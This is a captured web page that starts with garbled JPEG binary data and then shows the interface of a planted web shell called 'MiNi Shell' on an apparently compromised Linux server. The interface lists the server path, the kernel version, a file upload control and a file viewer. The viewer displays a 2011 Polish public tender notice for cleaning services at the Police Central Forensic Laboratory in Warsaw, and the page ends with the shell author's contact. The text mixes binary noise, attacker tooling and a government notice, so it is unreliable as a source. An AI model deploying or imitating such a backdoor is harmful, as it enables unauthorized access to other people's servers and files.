JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20111223/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20111223/436892-N-2011.html

<p class="kh_header"><b>Warszawa: Świadczenie usług sprzątania, polegających na kompleksowym utrzymaniu czystości i porządku w obiektach Centralnego Laboratorium Kryminalistycznego Policji</b><br>
<b>Numer ogłoszenia: 436892 - 2011; data zamieszczenia: 23.12.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Centralne Laboratorium Kryminalistyczne Policji , Al. Ujazdowskie 7, 00-583 Warszawa, woj. mazowieckie, tel. 22 601 55 95, faks 22 601 55 57.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.clk.policja.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie usług sprzątania, polegających na kompleksowym utrzymaniu czystości i porządku w obiektach Centralnego Laboratorium Kryminalistycznego Policji.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest świadczenie usług sprzątania, polegających na kompleksowym utrzymaniu czystości i porządku w obiektach Centralnego Laboratorium Kryminalistycznego Policji.

 Całkowita powierzchnia pomieszczeń wewnątrz budynków, których utrzymanie w czystości 
i porządku powierza się Wykonawcy wynosi 2.850m2.
	ul. Wiśniowa 58 - 650m2 w tym pow. biurowa 535m2 i laboratoryjna 115m2 , bez po-mieszczeń sanitarnych,
	ul. Iwicka 14 - 1.000m2  w tym pow. biurowa 565m2 i laboratoryjna 435m2 oraz 
6 pomieszczeń sanitarnych,
	Al. Ujazdowskie 7 - 1.200m2 część budynku obejmująca klatki schodowe (strona pół-nocna i południowa budynku - 3 piętra), północne skrzydło budynku i środkowa część budynku (parter i I piętro), pow. biurowa, 7 pomieszczeń sanitarnych, bez pow. labora-toryjnej. 

Przed złożeniem oferty istnieje możliwość obejrzenia obiektów po wcześniejszym uzgodnieniu terminu pod nr tel. 22 60 158-67 lub 22 60 155-95. Osoba do kontaktu: Mirosław Skuza.
Charakterystyka usług:
Czynności wykonywane codziennie (dni robocze) pomieszczeń biurowych, korytarzy, toalet oraz pomieszczeń laboratoryjnych i technicznych:
	czyszczenie powierzchni podłogowych w pomieszczeniach biurowych 
i laboratoryjnych, 
	odkurzanie wykładzin dywanowych, usuwanie ewentualnych plam i zabrudzeń,
	czyszczenie i wycieranie kurzu z powierzchni biurek, szafek i innego sprzętu biurowe-go, a także parapetów, pulpitów, listew ściennych, drzwi itp., 
	wycieranie kurzy z parapetów, luster, tablic, listew przypodłogowych i ściennych,
	zamiatanie i mycie przy pomocy środków myjąco-dezynfekujących i zapachowych podłóg,
	mycie, czyszczenie, dezynfekowanie urządzeń sanitarnych (umywalki, muszle 
i deski klozetowe, pisuary, armatura i inne akcesoria) oraz podłóg w sanitariatach,
	udrażnianie urządzeń sanitarnych w zakresie podstawowym (przetykanie z użyciem środków chemicznych);
	czyszczenie glazury łazienkowej, luster wraz z ramami, 
	neutralizacja zapachów w pomieszczeniach sanitarnych,
	mycie drzwi, framug i listew osłonowych, 
	wycieranie poręczy schodów (z użyciem odpowiedniego środka do mycia),
	opróżnianie koszy na śmieci oraz wymiana wkładów foliowych w koszach na śmieci,
	wynoszenie śmieci do kontenerów znajdujących się na zewnątrz budynku,
	odkurzanie i czyszczenie mebli tapicerowanych, 
	sprawdzanie każdorazowo przed opuszczeniem budynku, we wszystkich sprzątanych pomieszczeniach, czy zamknięte są okna, wyłączone oświetlenie i urządzenia ogrzewcze inne niż CO,

Czynności wykonywane okresowo raz w tygodniu lub częściej w miarę potrzeb: 

	mycie drzwi wejściowych, sprzątanie wejść,
	wycieranie na mokro grzejników, 
	przecieranie nóg krzeseł i stołów,
	odkurzanie i czyszczenie mebli tapicerowanych, 
	odkurzanie żaluzji, wertikali, czyszczenie opraw oświetleniowych, 
	czyszczenie mebli płynem do konserwacji mebli (pokrywanie emulsją), 
	doczyszczanie miejsc trudnodostępnych i usuwanie pajęczyn, 
	usuwanie kurzu z kratek wentylacyjnych, 
	czyszczenie przeszklonych drzwi wewnętrznych. 
	systematyczne wykładanie środków czystości w toaletach (środki zapachowe wiszące, pływające do sedesów i spłuczek), 
	doczyszczanie miejsc trudnodostępnych i usuwanie pajęczyn,
	usuwanie kurzu z kratek wentylacyjnych, 
	mycie wywieszek znajdujących się na korytarzach,

Inne obowiązki: 

	wyłączanie świateł, zamykanie okien i drzwi, 
	przestrzegania przepisów i instrukcji służbowych o ochronie BHP i ppoż., 
	wykonanie czynności porządkowych po ewentualnych awariach lub pracach remonto-wo - budowlanych, 
	zgłaszanie wszelkich zauważonych usterek technicznych. 

Czynności wykonywane raz na sześć miesięcy:
-   w terminach i na zasadach określonych przez Zamawiającego: 
	mycie okien (dwustronne) , ram, parapetów  w obiektach: 
al. Ujazdowskie 7 - tylko klatki schodowe - razem 25,60m2, 
ul. Iwicka 14 - wszystkie okna w budynku - razem 130,78m2,
ul. Wiśniowa 58 (okna wewnątrz budynku w Zakładzie Daktyloskopii)- razem 275m2
Razem powierzchnia okien : 431,38 m2

Wymagania techniczno-organizacyjne:
Wszystkie prace powinny być wykonywane w sposób najmniej uciążliwy dla użytkowników obiektu
	Wykonawca zobowiązany jest zapewnić taką obsadę ( liczbę osób - posiadających zaświadczenia o niekaralności) aby praca przebiegała sprawnie i dokładnie,
	Wykonawca zobowiązany jest do zapewnienia odpowiedniego i profesjonalnego sprzętu i wyposażenia oraz środków chemicznych, myjących, czyszczących, dezynfe-kujących i toaletowych w ilościach niezbędnych do utrzymania obiektu w stałej czysto-ści,
	Wszystkie  środki chemiczne stosowane do czyszczenia i konserwacji powierzchni czyszczonych muszą być wyposażone w Karty Charakterystyki Produktu Chemiczne-go oraz skonsultowane wcześniej z Zamawiającym,
	Wykonawca będzie wykonywał wymienione czynności wykorzystując własny sprzęt o wysokim standardzie technicznym oraz zakupione we własnym zakresie, niezbędne materiały,  środki czystości i  środki higieniczne. 
	Materiały używane przy realizacji umowy powinny posiadać atesty PZH i skutecznie czyścić zabrudzone powierzchnie oraz powinny cechować się najwyższą jakością.
	Zaopatrywanie w papier toaletowy, ręczniki papierowe typu ZZ i mydło w płynie leży po stronie Zamawiającego.
	Wykonawca zobowiązany jest na swój koszt zapewnić osobom sprzątającym sprzęt konieczny do realizacji zamówienia oraz odpowiednią swoją firmową (wraz z identyfi-katorem imiennym) odzież ochronną.

Wykonawca zobowiązany jest do wykonywania usługi sprzątania w dni robocze tj. od poniedziałku do piątku w następujących godzinach:
	6:00 - 10:00 - Al. Ujazdowskie 7;
	7:00 - 11:00 - ul. Wiśniowa 58 i ul. Iwicka 14.

Podczas pracy każda z osób sprzątających otwiera tylko to pomieszczenie, które aktualnie  sprząta. 
Drzwi pozostałych pomieszczeń powinny być w tym czasie zamknięte na klucz.

Kontrola czystości pomieszczeń będzie prowadzona okresowo przez pracowników Zamawiającego. 
Z czynności tej każdorazowo sporządzony będzie protokół, który zostanie przekazany wykonawcy. 
Przy drugim negatywnym protokole zawierającym ewentualne usterki i nieprawidłowości Zamawiający w stosunku do wykonawcy będzie naliczał kary umowne w wysokości jednej dniówki wyliczonej odpowiednio do zaoferowanej ceny całości usługi przez Wykonawcę - aż do momentu usunięcia zaniedbań wykazanych w protokole - łącznie z możliwością odstąpienia od umowy..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 90.91.00.00-9, 90.91.92.00-4, 90.91.13.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W postępowaniu mogą brać udział Wykonawcy niepodlegający wykluczeniu z powodu niespełnienia warunków o których mowa w art.24 ust.1 ustawy PZP.Oświadczenie wg wzoru - załącznik nr 2 Zamawiający będzie dokonywał oceny spełnienia powyższych warunków oraz sprawdzenia kompletności i poprawności na podstawie dostarczonych oświadczeń i dokumentów. Dokumenty należy składać w oryginale lub kopii poświadczonej za zgodność z oryginałem przez wykonawcę. W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia oraz w przypadku podmiotów trzecich, kopie dokumentów dotyczących odpowiednio wykonawcy lub podmiotów trzecich muszą być poświadczone za zgodność z oryginałem przez wykonawcę lub przez te podmioty. Przy dokonywaniu oceny spełnienia warunku Zamawiający stosuje zasadę spełnia / nie spełnia. Zamawiający wymaga spełnienia wszystkich powyższych warunków.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie opisuje i nie wyznacza szczegółowego warunku w tym zakresie</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca dysponuje osobami zdolnymi do wykonania zamówienia zał. nr 3 do umowy. Zamawiający będzie dokonywał oceny spełnienia powyższych warunków oraz sprawdzenia kompletności i poprawności na podstawie dostarczonych oświadczeń i dokumentów. Dokumenty należy składać w oryginale lub kopii poświadczonej za zgodność z oryginałem przez wykonawcę. W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia oraz w przypadku podmiotów trzecich, kopie dokumentów dotyczących odpowiednio wykonawcy lub podmiotów trzecich muszą być poświadczone za zgodność z oryginałem przez wykonawcę lub przez te podmioty. Przy dokonywaniu oceny spełnienia warunku Zamawiający stosuje zasadę spełnia / nie spełnia. Zamawiający wymaga spełnienia wszystkich powyższych warunków.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie opisuje i nie wyznacza szczegółowego warunku w tym zakresie</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
</li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.clk.policja.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Centralne Laboratorium Kryminalistyczne Policji, Zespół Finansowo-Księgowy, pokój 142, Al. Ujazdowskie 7, 00-583 Warszawa.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 30.12.2011 godzina 09:00, miejsce: Centralne Laboratorium Kryminalistyczne Policji, Al. Ujazdowskie 7, 00-583 Warszawa, Kancelaria 08:15 - 15.30.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com